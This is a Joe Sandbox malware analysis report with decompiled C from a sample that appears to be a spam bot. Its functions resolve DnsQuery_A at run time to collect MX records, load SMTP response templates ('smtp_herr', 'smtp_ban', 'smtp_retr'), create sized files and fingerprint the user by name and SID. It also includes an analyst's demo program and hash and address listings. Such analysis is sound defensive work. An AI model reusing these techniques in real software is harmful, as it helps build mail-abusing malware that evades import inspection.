                                                                                                                                  • API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 532768033-2547889144
                                                                                                                                  • Opcode ID: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
                                                                                                                                  • Instruction ID: d0441a1c6b983311c903b277fb7f4aa63ae84449d50a9e317f732e81e7264bbf
                                                                                                                                  • Opcode Fuzzy Hash: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
                                                                                                                                  • Instruction Fuzzy Hash: 85A17EB0E012288BDF24DF55DC89BEEB7B0AB44305F6481DAE4197B281D7789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __hextodec__inc__un_inc_isdigit_isxdigit
                                                                                                                                  • String ID: 8$F$o
                                                                                                                                  • API String ID: 245833041-550588462
                                                                                                                                  • Opcode ID: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
                                                                                                                                  • Instruction ID: 2e5843cf0efdca669e14db03ce57f9015b289e99c6720257502155bfede8526d
                                                                                                                                  • Opcode Fuzzy Hash: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
                                                                                                                                  • Instruction Fuzzy Hash: D4718FB0D05659DBCF25CF64C8943EEBB70AF95308F2481DBD8296B242D2799AC1CF49
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 59%
			/* E00402D21: resolve the MX records of the domain name in _a4 and
			 * return them as a singly linked list of heap nodes (or 0 on failure). */
			E00402D21(intOrPtr _a4) {
				long _v8;                      /* tail of the list being built */
				long _v12;                     /* head of the list (return value) */
				void* _v16;                    /* PDNS_RECORD out-parameter of DnsQuery_A */
				char _v28;                     /* 11-byte stack string: the DLL name */
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				/* 4+4+2+1 = 11 bytes copied onto the stack: the name of the module that
				 * exports DnsQuery_A, i.e. "dnsapi.dll" plus terminator (inferred from the
				 * byte count and the export name; the literal itself is not in this dump). */
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					/* resolved at run time, so DnsQuery_A never appears in the import table */
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					/* DnsQuery_A(pszName=_a4, wType=0xf (DNS_TYPE_MX), Options=0,
					 *            pExtra=NULL, ppQueryResults=&_v16, pReserved=NULL);
					 * a non-zero return is a DNS error code */
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						/* the DNS_RECORD chain from DnsQuery_A is never released with DnsRecordListFree */
						return _v12;
					}
					do {
						/* DNS_RECORDA.wType is at +8; anything that is not an MX record is skipped */
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						/* node layout, 0x108 bytes: +0 next, +4 preference, +8 exchange name[0x100] */
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);   /* memset-style zeroing of the new node */
						_t41 = _t41 + 0xc;                 /* cdecl cleanup of the three pushed arguments */
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;   /* Data.MX.wPreference at +0x1c */
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);       /* Data.MX.pNameExchange at +0x18, max 254 chars */
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;       /* append: previous tail's next pointer = new node */
						} else {
							_v12 = _t40;         /* first node becomes the head */
						}
						L12:
						_t37 =  *_t37;         /* DNS_RECORDA.pNext at +0 */
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				/* module not loaded yet: load it and retry the export lookup */
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}
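The routine above reads DNS_RECORDA fields by raw offset and copies each MX entry into a 0x108-byte heap node. The following is an added example, not code from the sample or from Joe Sandbox: it re-declares that 32-bit record layout and replays the same walk over a constructed in-memory image, the way an analyst would carve the list out of a process dump. The image base 0x00300000, the record contents, the exchange names and the host-side mx_node struct are all assumptions for illustration; the offsets and the 0xf type code are the ones the decompiled code uses.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DNS_TYPE_MX   0x000f   /* wType passed to DnsQuery_A and compared at +8 */
#define DNS_REC_SIZE  0x20     /* sizeof(DNS_RECORDA) for an MX record in a 32-bit process */

/* Field offsets of a 32-bit DNS_RECORDA, matching the pointer arithmetic in E00402D21. */
enum {
    OFF_PNEXT       = 0x00,   /* DNS_RECORDA *pNext */
    OFF_WTYPE       = 0x08,   /* WORD wType */
    OFF_MX_EXCHANGE = 0x18,   /* char *Data.MX.pNameExchange */
    OFF_MX_PREF     = 0x1c    /* WORD Data.MX.wPreference */
};

/* Host-side copy of the sample's node (+0 next, +4 preference, +8 name). In the
 * 32-bit sample this is 4+4+0x100 = 0x108 bytes; on a 64-bit host the pointer
 * makes it larger, but the field order and the 0x100-byte name buffer are the same. */
typedef struct mx_node {
    struct mx_node *next;
    uint32_t        preference;
    char            exchange[0x100];
} mx_node;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Walk the DNS_RECORDA chain starting at virtual address `first` inside an image of
 * `img_len` bytes mapped at `base`, and rebuild the MX list in the order the sample
 * produces (append at tail). Unlike the sample, every pointer is bounds-checked
 * against the image before it is dereferenced, since dump data is untrusted. */
mx_node *collect_mx(const uint8_t *img, size_t img_len, uint32_t base, uint32_t first)
{
    mx_node *head = NULL, *tail = NULL;
    uint32_t va = first;
    while (va != 0) {
        if (va < base || (size_t)(va - base) + DNS_REC_SIZE > img_len) break;
        const uint8_t *rec = img + (va - base);
        if (rd16(rec + OFF_WTYPE) == DNS_TYPE_MX) {
            mx_node *n = calloc(1, sizeof *n);          /* HeapAlloc followed by zeroing */
            if (!n) break;
            n->preference = rd16(rec + OFF_MX_PREF);     /* the "& 0xffff" in the sample */
            uint32_t name_va = rd32(rec + OFF_MX_EXCHANGE);
            if (name_va >= base && (size_t)(name_va - base) < img_len) {
                const char *src = (const char *)img + (name_va - base);
                size_t room = img_len - (name_va - base), len = 0;
                while (len < room && len < 0xfe && src[len] != '\0') len++;   /* lstrcpynA(.., 0xff) */
                memcpy(n->exchange, src, len);
            }
            if (tail) tail->next = n; else head = n;
            tail = n;
        }
        va = rd32(rec + OFF_PNEXT);
    }
    return head;
}

size_t mx_count(const mx_node *n) { size_t c = 0; for (; n; n = n->next) c++; return c; }
void mx_free(mx_node *n) { while (n) { mx_node *t = n->next; free(n); n = t; } }

/* Constructed test data (not a dump from the sample): a 0x100-byte fragment of a
 * 32-bit process at base 0x00300000 holding three records, MX / A / MX, and the
 * two exchange names they point at. */
#define IMG_BASE 0x00300000u
#define IMG_LEN  0x100u

void build_sample_image(uint8_t *img)
{
    memset(img, 0, IMG_LEN);
    memcpy(img + 0x60, "mx1.example.com", 16);
    memcpy(img + 0x80, "mx2.example.com", 16);
    wr32(img + 0x00 + OFF_PNEXT, IMG_BASE + 0x20);        /* record 0: MX, pref 10 */
    wr16(img + 0x00 + OFF_WTYPE, DNS_TYPE_MX);
    wr32(img + 0x00 + OFF_MX_EXCHANGE, IMG_BASE + 0x60);
    wr16(img + 0x00 + OFF_MX_PREF, 10);
    wr32(img + 0x20 + OFF_PNEXT, IMG_BASE + 0x40);        /* record 1: type A, must be skipped */
    wr16(img + 0x20 + OFF_WTYPE, 0x0001);
    wr32(img + 0x40 + OFF_PNEXT, 0);                      /* record 2: MX, pref 20, end of chain */
    wr16(img + 0x40 + OFF_WTYPE, DNS_TYPE_MX);
    wr32(img + 0x40 + OFF_MX_EXCHANGE, IMG_BASE + 0x80);
    wr16(img + 0x40 + OFF_MX_PREF, 20);
}

/* Build the image and carve the MX list from it, as the sample's caller would see it. */
mx_node *demo_list(void)
{
    static uint8_t img[IMG_LEN];
    build_sample_image(img);
    return collect_mx(img, IMG_LEN, IMG_BASE, IMG_BASE);
}

int main(void)
{
    mx_node *list = demo_list();
    for (const mx_node *n = list; n; n = n->next)
        printf("preference %u exchange %s\n", (unsigned)n->preference, n->exchange);
    mx_free(list);
    return 0;
}
```

Running it prints the two MX nodes in list order with the A record dropped, which is what a caller of E00402D21 receives; the bounds checks and the explicit free are the two things the sample omits.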

Instruction address column for E00402D21 (collapsed from the per-line listing): 0x00402d31 onward, with 0x00000000 on lines that have no address; the column is cut off at 0x00402dd4 on this page.
                                                                                                                                  0x00402dd9
                                                                                                                                  0x00402de0
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402ddb
                                                                                                                                  0x00402de2
                                                                                                                                  0x00402de2
                                                                                                                                  0x00402de4
                                                                                                                                  0x00402de6
                                                                                                                                  0x00000000
                                                                                                                                  0x00402dea
                                                                                                                                  0x00402d4a
                                                                                                                                  0x00402d52
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

APIs
• GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
• LoadLibraryA.KERNEL32(?), ref: 00402D4A
• GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
• GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
• HeapAlloc.KERNEL32(00000000), ref: 00402DA0
• lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
• String ID: DnsQuery_A$dnsapi.dll
• API String ID: 3560063639-3847274415
• Opcode ID: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
• Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
• Opcode Fuzzy Hash: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
• Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%
/* Decompiler output (Joe Sandbox IDA plugin). The comments below are an editor's reading of
   the code, not something the report states: _a4 appears to point at a received config
   record whose name string sits at +4, payload length at +0x18 and payload bytes at +0x24.
   For the records "smtp_herr", "smtp_ban" and "smtp_retr" the payload is split on '\n' into
   a NULL-terminated array of C strings, the array is stored in a per-record global
   (0x413630 / 0x413634 / 0x413638) and the previously stored array is released; when
   _a8 == 3 the global is simply cleared. E0040EBCC, E0040EC2E, E0040EE2A and E0040EE08
   behave like malloc, free, memset and memcpy respectively. */
E0040BE31(signed int _a4, intOrPtr _a8) {
	signed int _v8;
	CHAR* _v12;
	int _v16;
	intOrPtr _t25;          /* added: temporaries the decompiler used without declaring */
	intOrPtr _t31;
	int _t50;
	int _t51;
	intOrPtr _t52;
	intOrPtr _t55;
	intOrPtr _t57;
	void* _t59;
	char* _t66;
	CHAR* _t68;
	int _t70;               /* added, see above */
	int _t71;
	int _t72;
	void* _t76;
	intOrPtr _t78;
	signed int _t82;
	signed int _t83;
	signed int _t84;
	intOrPtr* _t86;
	void* _t88;
	void* _t91;             /* decompiler's stack-pointer tracking; never meaningfully read */
	void* _t92;

	_t83 = _a4;
	_t68 = _t83 + 4;        /* record name */
	_v12 = _t68;
	/* only the three SMTP response-template records are handled; anything else returns */
	if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
		L3:
		_t72 = 0;
		_v16 = 0;               /* new line array; stays NULL in the "clear" case */
		if(_a8 == 3) {
			L25:
			/* pick the global slot that belongs to this record name */
			if(lstrcmpiA(_v12, "smtp_herr") != 0) {
				if(lstrcmpiA(_v12, "smtp_ban") != 0) {
					_t50 = lstrcmpiA(_v12, "smtp_retr");
					_t51 = 0x413638;
					if(_t50 != 0) {
						_t51 = _a4;
					}
				} else {
					_t51 = 0x413634;
				}
			} else {
				_t51 = 0x413630;
			}
			/* swap in the new array and free every string of the old one, then the old array */
			_t86 =  *_t51;
			 *_t51 = _v16;
			if(_t86 == 0) {
				goto L36;
			} else {
				_t52 =  *_t86;
				_t84 = 0;
				while(_t52 != 0) {
					E0040EC2E(_t52);
					_t84 = _t84 + 1;
					_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
				}
				return E0040EC2E(_t86);
			}
		}
		/* first pass: count lines (a '\n' or the last byte ends a line) */
		_t55 =  *((intOrPtr*)(_t83 + 0x18));
		_t82 = 0;
		if(_t55 <= 0) {
			goto L25;
		} else {
			goto L5;
		}
		do {
			L5:
			if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
				_t82 = _t82 + 1;
			}
			_t72 = _t72 + 1;
		} while (_t72 < _t55);
		if(_t82 == 0) {
			goto L25;
		}
		/* array of _t82 pointers plus a NULL terminator, zero-filled */
		_t70 = 4 + _t82 * 4;
		_t51 = E0040EBCC(4 + _t82 * 4);
		_pop(_t76);
		_v16 = _t51;
		if(_t51 == 0) {
			goto L36;
		}
		E0040EE2A(_t76, _t51, 0, _t70);
		/* second pass: copy each line into its own buffer; _v8 is the start of the current line */
		_t57 =  *((intOrPtr*)(_t83 + 0x18));
		_v8 = _v8 & 0x00000000;
		_a4 = _a4 & 0x00000000;
		_t92 = _t91 + 0xc;
		if(_t57 > 0) {
			_t71 = _v16;
			do {
				_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
				if(_t78 == 0xa || _a4 == _t57 - 1) {
					_t88 = _a4 - _v8;     /* line length without the '\n' */
					if(_t78 != 0xa) {
						_t88 = _t88 + 1;  /* last line has no '\n', keep its final byte */
					}
					_t25 = _t88 + 1; // 0x1
					_t59 = E0040EBCC(_t25);
					 *_t71 = _t59;
					if(_t59 == 0) {
						goto L25;         /* allocation failed: install what was built so far */
					} else {
						E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
						_t92 = _t92 + 0xc;
						 *((char*)(_t88 +  *_t71)) = 0;
						/* strip a trailing '\r' so CRLF input yields clean lines */
						if(_t88 > 0) {
							_t31 =  *_t71 - 1; // -1
							_t66 = _t88 + _t31;
							if( *_t66 == 0xd) {
								 *_t66 = 0;
							}
						}
						_t71 = _t71 + 4;
						_v8 = _v8 + _t88 + 1;
						goto L22;
					}
				}
				L22:
				_a4 = _a4 + 1;
				_t57 =  *((intOrPtr*)(_t83 + 0x18));
			} while (_a4 < _t57);
		}
		goto L25;
	} else {
		_t51 = lstrcmpiA(_t68, "smtp_retr");
		if(_t51 != 0) {
			L36:
			return _t51;
		}
		goto L3;
	}
}
                                                                                                                                  0x0040bfc8
                                                                                                                                  0x0040bfab
                                                                                                                                  0x0040be80
                                                                                                                                  0x0040be83
                                                                                                                                  0x0040be87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be92
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9c
                                                                                                                                  0x0040be9d
                                                                                                                                  0x0040bea3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bea9
                                                                                                                                  0x0040beb1
                                                                                                                                  0x0040beb6
                                                                                                                                  0x0040beb7
                                                                                                                                  0x0040bebc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bec6
                                                                                                                                  0x0040becb
                                                                                                                                  0x0040bece
                                                                                                                                  0x0040bed2
                                                                                                                                  0x0040bed6
                                                                                                                                  0x0040bedb
                                                                                                                                  0x0040bee1
                                                                                                                                  0x0040bee4
                                                                                                                                  0x0040bee7
                                                                                                                                  0x0040beee
                                                                                                                                  0x0040bef9
                                                                                                                                  0x0040beff
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf02
                                                                                                                                  0x0040bf06
                                                                                                                                  0x0040bf0c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf12
                                                                                                                                  0x0040bf1c
                                                                                                                                  0x0040bf23
                                                                                                                                  0x0040bf26
                                                                                                                                  0x0040bf2c
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf49
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf52
                                                                                                                                  0x0040bf55
                                                                                                                                  0x0040bf5a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be61
                                                                                                                                  0x0040be67
                                                                                                                                  0x0040be6b
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be6b

APIs
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: lstrcmpi
• String ID: smtp_ban$smtp_herr$smtp_retr
• API String ID: 1586166983-1625972887
• Opcode ID: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
• Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
• Opcode Fuzzy Hash: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
• Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
	char _v5;
	char _v6;
	char _v7;
	char _v8;
	void* _v12;
	long _v16;
	long _v20;
	long _v24;
	intOrPtr _v28;
	long _v32;
	void* _t31;
	intOrPtr _t43;
	int _t44;
	void* _t53;
	int _t59;
	CHAR* _t68;
	void* _t69;
	int _t73;

	_t59 = __edx;
	_t68 = _a4;
	_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
	_v12 = _t31;
	if(_t31 == 0xffffffff) {
		*0x412180 = 0x5e0d0101;
		*0x41217c = GetLastError();
		__eflags = 0;
		return 0;
	}
	_v8 = *_t68;
	_v7 = _t68[1];
	_t63 = _a12;
	_v6 = _t68[2];
	_v5 = 0;
	if(GetDiskFreeSpaceA( &_v8, &_v20, &_v24, &_v16, &_v32) == 0) {
		L10:
		_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63);
		_v28 = _t43;
		if(_t43 != 0) {
			_t44 = CloseHandle(_v12);
			__eflags = _t44;
			if(_t44 != 0) {
				L15:
				return _v28;
			}
			*0x412180 = 0x5e0d0103;
			*0x41217c = GetLastError();
			CloseHandle(_v12);
			L14:
			DeleteFileA(_t68);
			goto L15;
		}
		*0x412180 = 0x5e0d0102;
		*0x41217c = GetLastError();
		CloseHandle(_v12);
		goto L14;
	}
	_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
	_t69 = _t69 + 0x10;
	_t73 = _t59;
	if(_t73 < 0) {
		goto L10;
	}
	if(_t73 > 0 || _t53 > 0x6400000) {
		_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
		_t63 = _t22;
		goto L10;
	} else {
		__eflags = _t59;
		if(__eflags < 0) {
			goto L10;
		}
		if(__eflags > 0) {
			L9:
			_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
			__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
			goto L10;
		}
		__eflags = _t53 - 0x3200000;
		if(_t53 <= 0x3200000) {
			goto L10;
		}
		goto L9;
	}
}

Address column for the C-code listing of E00406A60 above (one address per decompiled line, in listing order):
0x00406a60 0x00406a68 0x00406a7d 0x00406a83 0x00406a89 0x00406b8c 0x00406b9c 0x00406ba1 0x00000000 0x00406ba1
0x00406a91 0x00406a97 0x00406a9e 0x00406aa1 0x00406ab8 0x00406ac3 0x00406b1d 0x00406b27 0x00406b2f 0x00406b34
0x00406b5f 0x00406b61 0x00406b63 0x00406b86 0x00000000 0x00406b89 0x00406b65 0x00406b78 0x00406b7d 0x00406b7f
                                                                                                                                  0x00406b80
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b80
                                                                                                                                  0x00406b36
                                                                                                                                  0x00406b49
                                                                                                                                  0x00406b4e
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b4e
                                                                                                                                  0x00406ad2
                                                                                                                                  0x00406ad7
                                                                                                                                  0x00406ada
                                                                                                                                  0x00406adc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406ade
                                                                                                                                  0x00406af5
                                                                                                                                  0x00406af5
                                                                                                                                  0x00000000
                                                                                                                                  0x00406afd
                                                                                                                                  0x00406afd
                                                                                                                                  0x00406aff
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b01
                                                                                                                                  0x00406b0a
                                                                                                                                  0x00406b17
                                                                                                                                  0x00406b17
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b17
                                                                                                                                  0x00406b03
                                                                                                                                  0x00406b08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b08

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188212458-0
                                                                                                                                  • Opcode ID: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction ID: 11eff480047975ec65ad8f821bd7964ca9f9c490359b1bf2623e7d0ea65c751f
                                                                                                                                  • Opcode Fuzzy Hash: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction Fuzzy Hash: 2631F1B2900208BFDB00DFA09D44ADF7F79EF48310F158076E212F7291D674A9658F69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 557302112-2547889144
                                                                                                                                  • Opcode ID: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction ID: 77bf603594803d1c9b5e79f1d2728a729673d1f5d1a9e691231cf89a20a4aa33
                                                                                                                                  • Opcode Fuzzy Hash: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction Fuzzy Hash: 14A17CB4E012288FDB24CF54DC89BEEB7B0AB48305F5481DAE4196B291D6789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 93%
			// Builds "<user name>/<SID string>/<number>" in the caller's buffer and returns its length.
			// _a4: output buffer, _a8: size of that buffer in bytes (decompiler names kept as-is).
			E00406F5F(long _a4, long _a8) {
				void* _v8;                  // string form of the SID (allocated by the converter, freed below)
				long _v12;                  // size of the domain-name buffer _v212
				union _SID_NAME_USE _v16;   // SID type returned by LookupAccountNameA
				void _v84;                  // binary SID buffer
				char _v212;                 // domain-name buffer
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;
				
				_t68 = _a4;
				 *_t68 = 0;
				// Fetch the current user name into the output buffer; bail out on failure.
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				// Inline strlen of the user name: _a8 becomes the length written so far.
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;   // size of the SID buffer _v84
				_v12 = 0x80;  // size of the domain buffer _v212
				// Resolve the user name to its SID. If that fails, skip straight to the final "/%d" suffix.
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					// Append "/<number>" where the number comes from the helper E00406EDD (not resolved here).
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				// Append the "/" separator (E0040EF00 is a string-copy helper).
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				// L0040F4AA is the import thunk for ConvertSidToStringSidA (see the APIs list, ref 00406FE8):
				// converts the binary SID in _v84 into a string placed in _v8.
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				// Inline strlen of the SID string.
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				// Copy the SID string (including its terminator) after the separator; E0040EE08 is a memcpy-like helper.
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
